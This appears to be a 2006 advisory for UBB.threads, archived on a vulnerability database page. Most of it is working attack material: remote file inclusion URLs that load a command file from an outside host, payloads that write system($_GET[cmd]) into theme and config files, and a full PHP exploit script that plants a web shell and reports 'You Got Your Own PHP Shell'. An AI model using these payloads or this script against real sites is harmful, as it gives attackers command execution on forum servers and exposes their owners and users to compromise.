Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14498
HistorySep 29, 2006 - 12:00 a.m.

UBB.threads Multiple input validation error

2006-09-2900:00:00
vulners.com
142

Hello,

UBB.threads Multiple input validation error

Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : [email protected]

Tested on Version 6 (6.5.1.1) and other versions maybe affected

Remote File including :
ubbt.inc.php?GLOBALS[thispath]=http://localhost/cmd.txt?&cmd=dir
ubbt.inc.php?GLOBALS[configdir]=http://localhost/cmd.txt?&cmd=dir

Files overwrite vulnerabilities
if magic_qoutes_gpc = off

admin/doedittheme.php?theme[soqor]=".system($_GET[cmd])."&thispath=…/
and open
includes/theme.inc.php?cmd=ls -la
or :-
admin/doeditconfig.php?config[soqor]=".system($_GET[cmd])."&thispath=…/
and open
includes/config.inc.php?cmd=ls -la

– # – # – # –

if magic_qoutes_gpc = on
admin/doeditconfig.php?thispath=…/includes&config[path]=http://psevil.googlepages.com/cmd.txt?

and you will have a command execution files …
example
dorateuser.php?cmd=ls -la
calendar.php?cmd=ls -la
and so many other files which includes using this variable ($config[path])

Full path
cron/php/subscriptions.php


Exploit :-

#!/usr/bin/php -q -d short_open_tag=on
<?
/*
/* UBB.threads Multiple vulnerabilities
/* This exploit should allow you to execute commands
/* By : HACKERS PAL
/* WwW.SoQoR.NeT
/
print_r('
/
/
/
UBB.threads Command Execution /
/
by HACKERS PAL <[email protected]> /
/
site: http://www.soqor.net /');
if ($argc<2) {
print_r('
/
/
/
Usage: php '.$argv[0].' host
/
Example: /
/
php '.$argv[0].' http://localhost/
/
***/
');
die;
}
error_reporting(0);
ini_set("max_execution_time",0);

$url=$argv[1]."/";
$exploit="admin/doeditconfig.php?thispath=…/includes&config[path]=http://psevil.googlepages.com/cmd.txt?&quot;;
$page=$url.$exploit;
Function get_page($url)
{

              if&#40;function_exists&#40;&quot;file_get_contents&quot;&#41;&#41;
              {

                   $contents = file_get_contents&#40;$url&#41;;

                      }
                      else
                      {
                          $fp=fopen&#40;&quot;$url&quot;,&quot;r&quot;&#41;;
                          while&#40;$line=fread&#40;$fp,1024&#41;&#41;
                          {
                           $contents=$contents.$line;
                          }


                              }
                   return $contents;
     }

 $page    = get_page&#40;$page&#41;;

 $newpage = get_page&#40;$url.&quot;calendar.php&quot;&#41;;

 if&#40;eregi&#40;&quot;Cannot execute a blank command&quot;,$newpage&#41;&#41;
 {
   Die&#40;&quot;&#92;n[+] Exploit Finished&#92;n[+] Go To : &quot;.$url.&quot;calendar.php?cmd=ls -la&#92;n[+] You Got Your Own PHP Shell&#92;n/*        Visit us : WwW.SoQoR.NeT            */&#92;n/**********************************************/&quot;&#41;;
         }
         Else
         {
            Die&#40;&quot;&#92;n[-] Exploit Failed&#92;n/*        Visit us : WwW.SoQoR.NeT            */&#92;n/**********************************************/&quot;&#41;;
            }

?>

WwW.SoQoR.NeT